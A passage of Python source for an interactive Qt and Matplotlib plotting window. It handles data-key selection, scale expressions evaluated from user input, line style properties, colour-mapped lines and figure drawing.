        QtCore.Qt.Key_L: lambda self: self.confirm(),
        QtCore.Qt.Key_N: lambda self: self.cycle_editors(1),
        QtCore.Qt.Key_P: lambda self: self.cycle_editors(-1),
        QtCore.Qt.Key_Q: lambda self: self.close(),
        QtCore.Qt.Key_W: lambda self: self.close(),
    }
    def event(self, event):
        if (event.type() == QtCore.QEvent.KeyPress and
                event.modifiers() == CONTROL_MODIFIER and
                event.key() in self.control_actions):
            self.control_actions[event.key()](self)
            return True
        elif (event.type() == QtCore.QEvent.KeyPress and
              self.state() == self.NoState and
              event.key() in (QtCore.Qt.Key_Delete,
                              QtCore.Qt.Key_Backspace)):
            # Delete/Backspace outside edit mode clears the current cell.
            self.setItem(self.currentRow(),
                         self.currentColumn(),
                         QtWidgets.QTableWidgetItem(''))
            return True
        elif (event.type() == QtCore.QEvent.ShortcutOverride and
              self.state() == self.EditingState and
              event.key() in (QtCore.Qt.Key_Down, QtCore.Qt.Key_Up)):
            # Up/Down while editing: commit via a focus bounce, stay in place.
            self.focusNextPrevChild(event.key() == QtCore.Qt.Key_Down)
            self.focusNextPrevChild(event.key() != QtCore.Qt.Key_Down)
            return True
        try:
            return super(PropertyEditor, self).event(event)
        except TypeError:
            return False
class ComboBoxDialog(QtWidgets.QInputDialog):
    """QInputDialog variant whose helper returns (text, accepted)."""
    @staticmethod
    def getComboBoxItem(parent, title, label, items,
                        text='', editable=True, flags=0, hints=0):
        """Show a modal combo-box dialog; returns (chosen text, ok flag).

        On cancel the original *text* is returned with ok=False.
        """
        dialog = QtWidgets.QInputDialog(
            parent, QtCore.Qt.WindowFlags(flags))
        dialog.setWindowTitle(title)
        dialog.setLabelText(label)
        dialog.setComboBoxItems(items)
        dialog.setComboBoxEditable(editable)
        dialog.setInputMethodHints(QtCore.Qt.InputMethodHints(hints))
        dialog.setTextValue(text)
        if dialog.exec_() == QtWidgets.QDialog.Accepted:
            return dialog.textValue(), True
        return text, False
class DataObj(object):
    """One plotted dataset inside an Interact window.

    Owns the flattened data dict, the x/y key combo boxes and scale boxes,
    the per-line style ``props`` list, and optional color data
    (``cdata``/``norm``/``cmap``).  ``parent`` is the Interact window.
    """
    def __init__(self, parent, obj, name, **kwargs):
        self.parent = parent
        self.name = name
        self.widgets = []
        self.twin = False
        self.props = kwargs.get('props', {})
        self.process_props()
        # Structured arrays are treated as a dict of their named fields.
        if hasattr(obj, 'dtype'):
            obj = {n: obj[n] for n in obj.dtype.names}
        self.obj = flatten(obj, ndim=self.guess_ndim(obj, kwargs))
        self.label = QtWidgets.QLabel('', parent=self.parent)
        self._labels = getattr(obj, 'labels', kwargs.get('labels', None))
        self.choose_label()
        # LRU cache of eval_key results (bounded to 100 entries below).
        self.cache = collections.OrderedDict()
        draw = self.parent.draw
        self.scale_label = QtWidgets.QLabel('scale:', parent=self.parent)
        self.xscale_label = QtWidgets.QLabel('scale:', parent=self.parent)
        # Only array-valued keys are offered for plotting.
        self.words = [k for k in self.obj if hasattr(self.obj[k], 'dtype')]
        self.words.sort(key=parent.sortkey)
        def new_text_box():
            # Combo box + completer pair for choosing a data key.
            menu = KeyHandlerComboBox(parent=self.parent)
            menu.setModel(self.words)
            menu.setSizePolicy(QtWidgets.QSizePolicy(
                QtWidgets.QSizePolicy.MinimumExpanding,
                QtWidgets.QSizePolicy.Fixed))
            menu.setMaxVisibleItems(50)
            completer = menu.completer
            completer.set_textbox(menu)
            menu.activated.connect(draw)
            completer.activated.connect(draw)
            return completer, menu
        self.completer, self.menu = new_text_box()
        self.xcompleter, self.xmenu = new_text_box()
        # '_' means "plot y against sample index" (no x data).
        self.xmenu.setModel(self.words + ['_'])
        self.menu.setCurrentIndex(0)
        self.xmenu.setCurrentIndex(0)
        self.xlabel = QtWidgets.QLabel('x axis:', parent=self.parent)
        words = sorted(CONSTANTS, key=str.lower)
        def new_scale_box():
            # Line edit + completer for a numeric scale expression; named
            # constants from CONSTANTS are completable.
            scale_compl = TabCompleter(words, parent=self.parent)
            scale_box = KeyHandlerLineEdit(parent=self.parent)
            scale_box.completer = scale_compl
            scale_box.setFixedWidth(100)
            scale_compl.setWidget(scale_box)
            scale_box.setText('1.0')
            scale_compl.set_textbox(scale_box)
            def text_edited(text):
                scale_compl.skip_text = None
                if scale_compl.skip:
                    scale_compl.skip = False
                    return
                # Complete the word fragment just before the cursor.
                cursor_pos = scale_box.cursorPosition()
                text = text_type(scale_box.text())[:cursor_pos]
                prefix = re.split(r'\W', text)[-1].strip()
                scale_compl.setCompletionPrefix(prefix)
                scale_compl.complete()
                scale_compl.select_completion(0)
            def complete_text(text):
                if not scale_box.text():
                    return scale_box.setText(u'1.0')
                # Splice the accepted completion over the typed fragment.
                text = text_type(text)
                cursor_pos = scale_box.cursorPosition()
                before_text = text_type(scale_box.text())[:cursor_pos]
                after_text = text_type(scale_box.text())[cursor_pos:]
                prefix_len = len(re.split(r'\W', before_text)[-1].strip())
                part = before_text[-prefix_len:] if prefix_len else ''
                if not part and scale_compl.skip_text:
                    part = scale_compl.skip_text[0]
                if part and text.startswith(part):
                    scale_box.setText(before_text[:cursor_pos - prefix_len] +
                                      text + after_text)
                    scale_box.setCursorPosition(cursor_pos -
                                                prefix_len + len(text))
            def highlight(text):
                scale_compl.skip_text = text
            scale_box.returnPressed.connect(draw)
            scale_box.textEdited.connect(text_edited)
            scale_compl.activated.connect(complete_text)
            scale_compl.highlighted.connect(highlight)
            return scale_box, scale_compl
        self.scale_box, self.scale_compl = new_scale_box()
        self.xscale_box, self.xscale_compl = new_scale_box()
        self.kwargs = kwargs
        self.process_kwargs()
        self.process_cdata()
    def choose_label(self):
        """Pick a unique display label when several datasets share a name."""
        names = [d.name for d in self.parent.datas if d is not self]
        if self.name in names:
            labels = [text_type(d.label.text()).rstrip(':')
                      for d in self.parent.datas if d is not self]
            i = -1
            label = self.name
            while label in labels:
                i += 1
                label = '{} ({})'.format(self.name, i)
        else:
            label = self.name
        self.label.setText(label + ':')
        if self._labels is None:
            self.labels = getattr(self.obj, 'labels', label)
        else:
            self.labels = self._labels
    def guess_ndim(self, obj, kwargs):
        """Infer per-curve dimensionality from kwargs or the data arrays."""
        if isinstance(kwargs.get('ndim', None), int):
            return kwargs['ndim']
        for key in 'yname', 'xname':
            try:
                return np.ndim(obj[kwargs[key]])
            except KeyError:
                pass
        try:
            return min(len(v.shape) for v in obj.values()
                       if hasattr(v, 'dtype'))
        except ValueError:
            return None
    def eval_key(self, text):
        """Resolve *text* to data: direct key lookup, or a numpy expression.

        Non-identifier keys appearing in the expression are substituted
        with placeholder variables before eval.  Returns an EvalResult;
        on failure falls back to the currently selected menu key.
        NOTE: eval() of user-entered text — trusted interactive input only.
        """
        if text in self.obj:
            return EvalResult(value=self.obj[text], ok=True, warnings=[])
        elif text == '_':
            return EvalResult(value=None, ok=False, warnings=[])
        cache_key = text
        cache = self.cache
        try:
            return cache[cache_key]
        except KeyError:
            pass
        keys = set(self.obj)
        replace = {}
        for key, value in self.obj.items():
            if IDENTIFIER_RE.match(key) or key not in text:
                continue
            pattern = re.compile(r'\b' + re.escape(key) +
                                 r'(\b|(?=[^A-Za-z0-9_])|$)')
            # First unused '__N' placeholder name.
            var = '__' + str(next(i for i in count()
                                  if '__' + str(i) not in keys))
            keys.add(var)
            text = pattern.sub('(' + var + ')', text)
            replace[var] = value
        logger.debug('eval_key after text = %s', text)
        try:
            result = EvalResult(
                value=eval(text, {'np': np, 'numpy': np}, collections.ChainMap(
                    replace, self.obj, CONSTANTS, np.__dict__)),
                ok=True, warnings=[])
            if np.isscalar(result.value):
                raise ValueError('scalar result')
        except Exception as e:
            warning = 'Error evaluating key: ' + text_type(e)
            try:
                return EvalResult(value=self.obj[text_type(
                    self.menu.itemText(self.menu.currentIndex()))],
                    ok=False, warnings=[warning])
            except Exception:
                return EvalResult(value=None, ok=False, warnings=[warning])
        cache[cache_key] = result
        # Bound the cache, evicting the oldest entries first.
        while len(cache) > 100:
            cache.popitem(last=False)
        return result
    @property
    def cdata(self):
        """Color-data array; string values are (re)evaluated lazily."""
        if isinstance(self._cdata, str):
            if not self._cdata:
                return None
            value, ok, _ = self.eval_key(self._cdata)
            if not ok:
                logger.warning('invalid cdata key: %r', self._cdata)
                self._cdata = None
                return
            return value
        return self._cdata
    @cdata.setter
    def cdata(self, value):
        logger.debug('cdata.setter %r', value)
        self._cdata = value
    def set_name(self, menu, name):
        """Set *menu*'s text to *name* if it evaluates; return success.

        NOTE(review): findText is done on self.menu even when *menu* is
        self.xmenu — looks suspicious; confirm intended.
        """
        index = self.menu.findText(name)
        if index >= 0:
            menu.setCurrentIndex(index)
        value, ok, warnings = self.eval_key(name)
        if ok:
            menu.setCurrentText(name)
        return ok
    def set_xname(self, xname):
        logger.debug('set_xname %r', xname)
        return self.set_name(self.xmenu, xname)
    def set_xscale(self, xscale):
        self.xscale_box.setText(text_type(xscale))
    def set_yname(self, yname):
        logger.debug('set_yname %r', yname)
        return self.set_name(self.menu, yname)
    def set_yscale(self, yscale):
        self.scale_box.setText(text_type(yscale))
    def process_kwargs(self):
        """Route constructor kwargs to props (style) or set_* methods."""
        for k, v in self.kwargs.items():
            k = ALIASES.get(k, k)
            if k in PROPERTIES:
                for p in self.props:
                    p.setdefault(k, v)
            else:
                getattr(self, 'set_' + k, lambda _: None)(v)
        # Canonicalize any remaining short aliases inside props.
        for alias, prop in ALIASES.items():
            for p in self.props:
                if alias in p:
                    p[prop] = p.get(prop, p.pop(alias))
        for k in 'c', 'color', 'linestyle', 'ls':
            self.kwargs.pop(k, None)
        # Resolve 'CN' color shorthands to concrete prop-cycle colors.
        for p in self.props:
            if mpl.colors._is_nth_color(p.get('color', None)):
                p['color'] = nth_color_value(p['color'])
    def process_cdata(self):
        """Initialize color data plus its normalization and colormap."""
        self.cdata = self.kwargs.get('cdata', None)
        if self.cdata is not None:
            self.norm = self.kwargs.get('norm', None)
            if not self.norm:
                self.norm = np.nanmin(self.cdata), np.nanmax(self.cdata)
            if not isinstance(self.norm, mpl.colors.Normalize):
                self.norm = mpl.colors.Normalize(*self.norm)
            try:
                self.cmap = mpl.cm.get_cmap(
                    self.kwargs.get('cmap', mpl.rcParams['image.cmap']))
            except Exception:
                self.cmap = mpl.cm.jet
    def process_props(self):
        """Normalize ``props`` into a list of per-line property dicts.

        Accepts a dict (scalar values, or equal-length sequences which are
        transposed into one dict per line), a matplotlib format string, or
        a list of either.
        NOTE(review): collections.Sized was removed from the collections
        namespace in Python 3.10 (now collections.abc.Sized).
        """
        logger.debug('processing props: %s', self.props)
        if isinstance(self.props, dict):
            self.props = self.props.copy()
            if self.props:
                keys, values = zip(*self.props.items())
                if all(isinstance(vs, collections.Sized)
                       for vs in values) and all(len(vs) == len(values[0])
                                                 for vs in values):
                    self.props = [{} for v in values[0]]
                    for k, vs in zip(keys, values):
                        for p, v in zip(self.props, vs):
                            p[k] = v
                else:
                    self.props = [self.props.copy()]
            else:
                self.props = [self.props.copy()]
        elif isinstance(self.props, text_type):
            self.props = [process_props_format(self.props)]
        else:
            self.props = [process_props_format(p) if isinstance(p, text_type)
                          else p.copy() for p in self.props]
    def copy(self):
        """Return a dataobj() tuple replicating this dataset's current state."""
        kwargs = self.kwargs.copy()
        kwargs['props'] = copy.deepcopy(self.props)
        kwargs['xname'] = self.xmenu.lineEdit().text()
        kwargs['xscale'] = self.xscale_box.text()
        kwargs['yname'] = self.menu.lineEdit().text()
        kwargs['yscale'] = self.scale_box.text()
        kwargs.update({k: getattr(self, k, None)
                       for k in ('cdata', 'cmap', 'norm')})
        if isinstance(getattr(self, '_cdata', None), str):
            kwargs['cdata'] = self._cdata
        return dataobj(self.obj, name=self.name, **kwargs)
    def duplicate(self):
        """Add a copy of this dataset to the window, with fresh cycle props."""
        data = self.copy()
        if self.parent.in_cycle(self):
            new_props = next(self.parent.props_iter)
            # data[-1] is the kwargs dict of the dataobj() tuple.
            for p in data[-1]['props']:
                p.update(new_props)
        self.parent.add_data(*data)
        if len(self.parent.datas) == 2:
            self.parent.init_props()
        data = self.parent.datas[-1]
        self.parent.set_layout()
        data.menu.setFocus()
        data.menu.lineEdit().selectAll()
    def remove(self):
        """Remove this dataset from the parent window."""
        self.parent.remove_data(self)
    def change_label(self):
        """Prompt for a new name and refresh labels/legend."""
        text, ok = QtWidgets.QInputDialog.getText(
            self.parent, 'Rename data object', 'New label:',
            QtWidgets.QLineEdit.Normal, self.name)
        if ok and text_type(text):
            self.name = text_type(text)
            self._labels = None
            self.choose_label()
            if not isiterable(self.labels):
                self.labels = self.name
            self.parent.draw()
    def edit_cdata(self):
        """Interactively choose the color-data key, limits, and colormap."""
        logger.debug('edit_cdata %r', getattr(self, '_cdata', None))
        text, ok = ComboBoxDialog.getComboBoxItem(
            parent=self.parent,
            title='Set color data',
            label='Color data key:',
            items=self.words,
            flags=QtWidgets.QLineEdit.Normal,
            text=self._cdata
            if isinstance(getattr(self, '_cdata', None), str)
            else '',
        )
        if not ok:
            return
        try:
            self.cdata = text
            # Per-line colors would fight the colormap; drop any fixed color.
            self.props[0].pop('color', None)
            norm = getattr(self, 'norm', (np.nanmin(self.cdata),
                                          np.nanmax(self.cdata)))
            if not isinstance(norm, mpl.colors.Normalize):
                norm = mpl.colors.Normalize(*norm)
            text, ok = QtWidgets.QInputDialog.getText(
                self.parent, 'Set color limits', 'Color limits:',
                QtWidgets.QLineEdit.Normal, str((norm.vmin, norm.vmax)))
            if not ok:
                return
            if not text:
                text = repr((None,) * 2)
            try:
                self.norm = mpl.colors.Normalize(*ast.literal_eval(text))
            except Exception:
                self.norm = norm
            cmap = mpl.cm.get_cmap(
                getattr(self, 'cmap', mpl.rcParams['image.cmap']))
            text, ok = QtWidgets.QInputDialog.getText(
                self.parent, 'Set colormap', 'Colormap:',
                QtWidgets.QLineEdit.Normal, cmap.name)
            if not ok:
                return
            try:
                self.cmap = mpl.cm.get_cmap(text)
            except Exception:
                self.cmap = cmap
        finally:
            # Roll back a half-configured state, then redraw regardless.
            if not hasattr(self, 'norm') or not hasattr(self, 'cdata'):
                self.cdata = None
            self.parent.draw()
    def edit_props(self):
        """Populate and show the shared PropertyEditor for this dataset."""
        props_editor = self.parent.props_editor
        try:
            props_editor.itemChanged.disconnect()
        except TypeError:
            pass
        props_editor.dataobj = self
        for i, k in enumerate(PROPERTIES):
            item = QtWidgets.QTableWidgetItem(k)
            item.setFlags(QtCore.Qt.ItemIsEditable)
            item.setForeground(QtGui.QColor(0, 0, 0))
            props_editor.setItem(i, 0, item)
            props_editor.setItem(i, 1, QtWidgets.QTableWidgetItem(''))
            # Show a value only when all lines agree on it.
            if self.props and (all(k in p for p in self.props) and
                               all(p[k] == self.props[0][k]
                                   for p in self.props[1:])):
                props_editor.setItem(i, 1, QtWidgets.QTableWidgetItem(
                    props_repr(self.props[0][k])))
        props_editor.setWindowTitle(text_type(self.label.text()))
        props_editor.itemChanged.connect(self.update_props)
        props_editor.show()
    def update_props(self, item):
        """Apply an edited PropertyEditor cell to every line's props."""
        if self.parent.props_editor.dataobj is not self:
            return
        row = item.row()
        key = text_type(self.parent.props_editor.item(row, 0).text())
        value = self.parent.props_editor.item(row, 1)
        if value:
            # Interpret the cell as a Python literal, else keep raw text.
            try:
                value = ast.literal_eval(text_type(value.text()))
            except (SyntaxError, ValueError):
                value = text_type(value.text())
        if key == 'color' and mpl.colors._is_nth_color(value):
            value = nth_color_value(value)
        if all(key in p and p[key] == value for p in self.props):
            return
        elif value == '' and any(key in p for p in self.props):
            for p in self.props:
                p.pop(key, None)
        elif str(value):
            for p in self.props:
                p[key] = value
        self.parent.props_editor.setItem(
            row, 1, QtWidgets.QTableWidgetItem(props_repr(value)))
        self.parent.draw(keeplims=True)
    def close(self):
        self.parent.props_editor.close()
    def toggle_twin(self):
        """Toggle plotting on the twin (right-hand) y-axis."""
        self.twin = not self.twin
        self.parent.draw()
    def sync(self, axes='xy'):
        """Copy this dataset's key/scale to every dataset, per axis in *axes*."""
        for completer in (self.completer, self.xcompleter,
                          self.scale_compl, self.xscale_compl):
            completer.close_popup()
        for ax in axes:
            menu, scale = (self.xmenu, self.xscale_box) if ax == 'x' else (
                self.menu, self.scale_box)
            for d in self.parent.datas:
                # Only propagate the scale where the key actually resolves.
                if getattr(d, 'set_%sname' % ax)(
                        text_type(menu.lineEdit().text())):
                    getattr(d, 'set_%sscale' % ax)(text_type(scale.text()))
        self.parent.draw()
class Interact(QtWidgets.QMainWindow):
    """Main window: a Matplotlib canvas plus one grid row of key/scale
    widgets per data set, with keyboard shortcuts for axis and window
    control.
    """
    def __init__(self, data, app, title=None, sortkey=None, axisequal=False,
                 parent=None, max_label_len=None, **kwargs):
        """Build the figure, toolbar, property editor and per-data rows.

        data: iterable of (mapping, name[, options]) entries (see create()).
        app: the running QApplication, kept for reference bookkeeping.
        """
        self.app = app
        QtWidgets.QMainWindow.__init__(self, parent)
        self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
        self.setWindowTitle(title or ', '.join(d[1] for d in data))
        if sortkey is None:
            self.sortkey = kwargs.get('key', str.lower)
        else:
            self.sortkey = sortkey
        self.grid = QtWidgets.QGridLayout()
        self.frame = QtWidgets.QWidget()
        self.dpi = 100
        self.fig = Figure(tight_layout=False)
        self.canvas = FigureCanvas(self.fig)
        self.canvas.setParent(self.frame)
        self.canvas.setFocusPolicy(QtCore.Qt.ClickFocus)
        self.canvas.mpl_connect('key_press_event', self.canvas_key_press)
        self.axes = self.fig.add_subplot(111)
        # Create the twin axes up front so attributes exist, but keep it
        # out of the figure until a data set actually requests it.
        self.axes2 = self.axes.twinx()
        self.fig.delaxes(self.axes2)
        self.xlim = None
        self.ylim = None
        self.xlogscale = 'linear'
        self.ylogscale = 'linear'
        self.axisequal = axisequal
        self.max_label_len = max_label_len
        self.margins = 0
        self.mpl_toolbar = NavigationToolbar(self.canvas, self.frame)
        self.pickers = None
        self.vbox = QtWidgets.QVBoxLayout()
        self.vbox.addWidget(self.mpl_toolbar)
        self.props_editor = PropertyEditor(self)
        self.datas = []
        for d in data:
            self.add_data(*d)
        self.cycle = kwargs.get('prop_cycle', mpl.rcParams['axes.prop_cycle'])
        self.init_props()
        self.vbox.addLayout(self.grid)
        self.set_layout()
    def set_layout(self):
        """Assemble the central widget, fix the widget tab order and draw."""
        self.vbox.addWidget(self.canvas)
        self.frame.setLayout(self.vbox)
        self.setCentralWidget(self.frame)
        for data in self.datas:
            self.setTabOrder(data.menu, data.scale_box)
            self.setTabOrder(data.scale_box, data.xmenu)
            self.setTabOrder(data.xmenu, data.xscale_box)
        if len(self.datas) >= 2:
            for d1, d2 in zip(self.datas[:-1], self.datas[1:]):
                self.setTabOrder(d1.menu, d2.menu)
        self.draw()
    def add_data(self, obj, name, kwargs=None):
        """Create a DataObj for *obj* and add its widget row to the grid."""
        kwargs = kwargs or {}
        kwargs['name'] = kwargs.get('name', name) or 'data'
        data = DataObj(self, obj, **kwargs)
        self.datas.append(data)
        self.row = self.grid.rowCount()
        self.column = 0
        def axisequal():
            # Toggle equal-aspect display; bound to each row's widgets.
            self.axisequal = not self.axisequal
            self.draw()
        def add_widget(w, axis=None):
            # Place *w* in the next grid cell and wire up its signals.
            self.grid.addWidget(w, self.row, self.column)
            data.widgets.append(w)
            if isinstance(w, KeyHandlerMixin):
                w.duplicate.connect(data.duplicate)
                w.remove.connect(data.remove)
                w.closed.connect(data.close)
                w.axisEqual.connect(axisequal)
                w.relabel.connect(data.change_label)
                w.editCdata.connect(data.edit_cdata)
                w.editProps.connect(data.edit_props)
                w.sync.connect(data.sync)
                w.twin.connect(data.toggle_twin)
                w.xlim.connect(self.set_xlim)
                w.ylim.connect(self.set_ylim)
                if axis:
                    w.syncAxis.connect(lambda axes=[axis]: data.sync(axes))
            self.column += 1
        add_widget(data.label)
        add_widget(data.menu, 'y')
        add_widget(data.scale_label)
        add_widget(data.scale_box, 'y')
        add_widget(data.xlabel)
        add_widget(data.xmenu, 'x')
        add_widget(data.xscale_label)
        add_widget(data.xscale_box, 'x')
    def init_props(self):
        """Seed per-data default props from the prop cycle so multiple
        data sets come up with distinct colors/styles."""
        self.props_iter = cycle(self.cycle)
        if len(self.datas) > 1:
            for data, props in zip(self.datas, self.props_iter):
                if data.cdata is not None and 'color' in props:
                    continue
                for k, v in props.items():
                    for p in data.props:
                        p.setdefault(k, v)
    def warn(self, message):
        """Show *message* as the only warning and repaint the canvas."""
        self.warnings = {message}
        self.draw_warnings()
        self.canvas.draw()
    def remove_data(self, data):
        """Remove *data*'s row and widgets; recycle its prop-cycle entry."""
        if len(self.datas) < 2:
            return self.warn("Can't delete last row")
        # Check if props can be reused
        if self.in_cycle(data):
            self.props_iter = chain([{p: data.props[0][p]
                                      for p in self.cycle.keys}],
                                    self.props_iter)
        index = self.datas.index(data)
        self.datas.pop(index)
        for widget in data.widgets:
            self.grid.removeWidget(widget)
            widget.deleteLater()
        if self.props_editor.dataobj is data:
            self.props_editor.close()
        self.set_layout()
        self.draw()
        self.datas[index - 1].menu.setFocus()
        self.datas[index - 1].menu.lineEdit().selectAll()
    def in_cycle(self, data):
        """Return True if *data*'s props look like an unmodified entry of
        the prop cycle (so the entry can be handed back to props_iter)."""
        if not data.props:
            return False
        d0 = {k: v for k, v in data.props[0].items() if k in self.cycle.keys}
        if d0 not in self.cycle:
            return False
        for props in data.props[1:]:
            if any(props.get(k, None) != v for k, v in d0.items()):
                return False
        return True
    def get_scale(self, textbox, completer):
        """Evaluate the scale expression in *textbox*; 1.0 on failure.

        Evaluates user-entered text with eval() against CONSTANTS -- this
        is trusted, local UI input.
        """
        completer.close_popup()
        text = text_type(textbox.text())
        try:
            return eval(text, CONSTANTS.copy())
        except Exception as e:
            self.warnings.add('Error setting scale: ' + text_type(e))
            return 1.0
    def get_key(self, data, menu):
        """Return a key from *menu* that evaluates on *data*.

        Falls back to the first completion that evaluates; collects the
        original warnings when nothing works.
        """
        text = menu.currentText()
        value, ok, warnings = data.eval_key(text)
        if ok:
            return text
        model = menu.completer.completionModel()
        for row in range(model.rowCount()):
            key = model.data(model.index(row, 0))
            # eval_key appears to return a namedtuple-like result here
            # (attribute access) vs. tuple unpacking above.
            if data.eval_key(key).ok:
                logger.debug('replacing %r with %r', text, key)
                menu.focusNextChild()
                menu.lineEdit().setText(key)
                menu.setFocus()
                return key
        else:
            # for/else: no completion evaluated successfully.
            self.warnings.update(warnings)
        return text
    @staticmethod
    def cla(axes):
        """Clear *axes* but preserve its margin/tight autoscale settings."""
        tight, xmargin, ymargin = axes._tight, axes._xmargin, axes._ymargin
        axes.clear()
        axes._tight, axes._xmargin, axes._ymargin = tight, xmargin, ymargin
    def clear_pickers(self):
        """Disable and drop any active pickers."""
        if self.pickers:
            [p.disable() for p in self.pickers]
        self.pickers = None
    def plot(self, axes, data):
        """Plot one DataObj on *axes* and return the created lines.

        Resolves the x/y keys and scales, checks dimension compatibility,
        then assigns labels and user props to the new lines and records
        them for the legend.
        """
        xscale = self.get_scale(data.xscale_box, data.xscale_compl)
        yscale = self.get_scale(data.scale_box, data.scale_compl)
        xname = self.get_key(data, data.xmenu)
        yname = self.get_key(data, data.menu)
        y, ok, warnings = data.eval_key(yname)
        self.warnings.update(warnings)
        logger.debug('eval_key y %r ok = %s', yname, ok)
        if ok:
            y = np.asanyarray(y) * yscale
            x, xok, warnings = data.eval_key(xname)
            self.warnings.update(warnings)
            ok = ok and xok
            logger.debug('eval_key x %r ok = %s', xname, ok)
            if ok:
                x = np.asanyarray(x) * xscale
            elif xname == '_':
                # '_' means "plot against sample index".
                x = mpl.cbook.index_of(y)
        if ok and x is not None and x.shape[0] in y.shape:
            # Roll the axis matching len(x) to the front so each row of y
            # is one line over x.
            xaxis = y.shape.index(x.shape[0])
            lines = self.lines(axes, data, x, np.rollaxis(y, xaxis))
        else:
            if ok and x is not None:
                self.warnings.add(
                    '{} {} and {} {} have incompatible dimensions'.format(
                        xname, x.shape, yname, y.shape))
            lines = self.lines(axes, data, None, y)
        auto = False
        if not isiterable(data.labels):
            if len(lines) > 1:
                # Auto-number labels when one base label covers many lines.
                auto = data.labels
                data.labels = ['%s %d' % (auto, i) for i in range(len(lines))]
            else:
                data.labels = [data.labels]
        while len(data.props) < len(lines):
            data.props.append(data.props[-1])
        keys = set()
        for i, (line, label, props) in enumerate(
                zip(lines, data.labels, data.props)):
            line.set_label(label)
            for key, value in props.items():
                getattr(line, 'set_' + key, lambda _: None)(value)
            props = copy.copy(props)
            props.update([('color', line.get_color()),
                          ('linestyle', line.get_linestyle()),
                          ('linewidth', line.get_linewidth())])
            # Don't add multi-colored lines to legend
            if isinstance(line, mpl.collections.LineCollection):
                continue
            # Legend entries are merged per unique style key.
            key = tuple(sorted(zip(*(map(str, x) for x in props.items()))))
            keys.add(key)
            self.label_lists.setdefault(key, []).append(label)
            self.handles.setdefault(key, line)
        if auto and len(keys) == 1:
            # All lines share one style: collapse back to the base label.
            for line in lines:
                line.set_label(auto)
            self.label_lists[key] = [auto]
        return lines
    def lines(self, axes, data, x, y):
        """Create the line artists for (x, y), honoring data.cdata.

        With per-sample cdata matching y's shape, builds a LineCollection
        of half-segments colored through data.cmap/norm; with per-line
        cdata, colors whole lines; otherwise defers to axes.plot.
        """
        colors = [p.get('color', None) for p in data.props]
        if data.cdata is not None and not any(colors):
            cdata = data.cdata
            if x is not None and cdata.shape == y.shape:
                x, y = np.ma.filled(x, np.nan), np.ma.filled(y, np.nan)
                x, y, cdata = map(np.atleast_2d,
                                  map(np.transpose, (x, y, cdata)))
                def pairs(v):
                    # Split each sample interval at its midpoint so every
                    # half-segment can carry its own color value.
                    mid = (v[1:] + v[:-1]) / 2.0
                    vnew = np.empty((2 * (v.size - 1), 2))
                    vnew[::2, 0], vnew[::2, 1] = v[:-1], mid
                    vnew[1::2, 0], vnew[1::2, 1] = mid, v[1:]
                    return vnew
                segments = np.concatenate([np.stack((pairs(x), pairs(y)), -1)
                                           for x, y in zip(x, y)])
                colors = np.concatenate([np.repeat(c, 2)[1:-1] for c in cdata])
                lines = mpl.collections.LineCollection(
                    segments, norm=data.norm, cmap=data.cmap)
                lines.set_array(colors)
                axes.add_collection(lines)
                axes.autoscale_view()
                return lines,
            else:
                lines = axes.plot(y) if x is None else axes.plot(x, y)
                for line, c in zip(lines, cdata):
                    line.set_color(data.cmap(data.norm(c)))
                return lines
        else:
            return axes.plot(y) if x is None else axes.plot(x, y)
    def draw(self, *, keeplims=False):
        """Rebuild the whole figure from the current widget state.

        With keeplims=True the current axis limits are restored after the
        replot (used when only line properties changed).
        """
        logger.debug('Interact.draw keeplims=%r', keeplims)
        self.mpl_toolbar.home = self.draw
        if keeplims:
            limits = self.axes.axis(), self.axes2.axis()
        twin = any(d.twin for d in self.datas)
        self.clear_pickers()
        self.fig.clear()
        self.axes = self.fig.add_subplot(111)
        # First data set with cdata drives the colorbar (no twin axis).
        data = next((d for d in self.datas if d.cdata is not None), None)
        if data and not twin:
            self.mappable = mpl.cm.ScalarMappable(norm=data.norm,
                                                  cmap=data.cmap)
            self.mappable.set_array(data.cdata)
            self.colorbar = self.fig.colorbar(
                self.mappable, ax=self.axes, fraction=0.1, pad=0.02)
            self.colorbar.set_label(data._cdata if isinstance(data._cdata, str)
                                    else data.name)
        elif twin:
            self.axes2 = self.axes.twinx()
        for ax in self.axes, self.axes2:
            if len(self.datas) > 1 and any(k in data.props
                                           for k in self.cycle.keys
                                           for data in self.datas):
                ax.set_prop_cycle(cycler(color=['C0']))
            ax._tight = bool(self.margins)
            if self.margins:
                ax.margins(self.margins)
        lines = []
        xlabel = []
        ylabel = []
        xlabel2 = []
        ylabel2 = []
        self.warnings = set()
        self.label_lists, self.handles = OrderedDict(), OrderedDict()
        for i, d in enumerate(self.datas, 1):
            logger.debug('plotting data %s of %s', i, len(self.datas))
            if d.twin:
                axes, x, y = self.axes2, xlabel2, ylabel2
            else:
                axes, x, y = self.axes, xlabel, ylabel
            lines.extend(self.plot(axes, d))
            text = self.get_key(d, d.menu)
            xtext = self.get_key(d, d.xmenu)
            if xtext:
                x.append(xtext + ' (' + d.name + ')')
            y.append(text + ' (' + d.name + ')')
        self.axes.set_xlabel('\n'.join(xlabel))
        self.axes.set_ylabel('\n'.join(ylabel))
        self.draw_warnings()
        self.axes2.set_xlabel('\n'.join(xlabel2))
        self.axes2.set_ylabel('\n'.join(ylabel2))
        if self.xlim:
            self.axes.set_xlim(self.xlim)
        ylim = self.find_ylim(lines)
        if ylim and not self.ylim:
            self.axes.set_ylim(ylim)
        if self.ylim:
            self.axes.set_ylim(self.ylim)
        self.axes.set_xscale(self.xlogscale)
        self.axes.set_yscale(self.ylogscale)
        for ax in self.axes, self.axes2:
            ax.set_aspect('equal' if self.axisequal else 'auto', 'datalim')
        labels = [', '.join(unique(x)) for x in self.label_lists.values()]
        for i, label in enumerate(labels):
            if self.max_label_len and len(label) > self.max_label_len:
                labels[i] = label[:self.max_label_len] + '…'
        self.pickers = [picker(ax) for ax in [self.axes, self.axes2]]
        if keeplims:
            self.axes.axis(limits[0])
            self.axes2.axis(limits[1])
        # Ignore the legend in tight_layout
        self.fig.tight_layout()
        # NOTE(review): Legend.draggable() was removed in Matplotlib 3.7;
        # newer versions require legend(...).set_draggable(True) -- confirm
        # the supported Matplotlib range.
        self.axes.legend(self.handles.values(), labels,
                         ncol=1 + len(labels) // 10,
                         handlelength=1.5).draggable(True)
        self.canvas.draw()
    def find_ylim(self, lines):
        """Return (ymin, ymax) covering the plotted segments that fall
        inside the current x-limits, or None if nothing qualifies."""
        lower, upper = self.axes.get_xlim()
        ymin, ymax = np.inf, -np.inf
        ylim = None
        _lines = []
        for line in lines:
            if isinstance(line, mpl.collections.LineCollection):
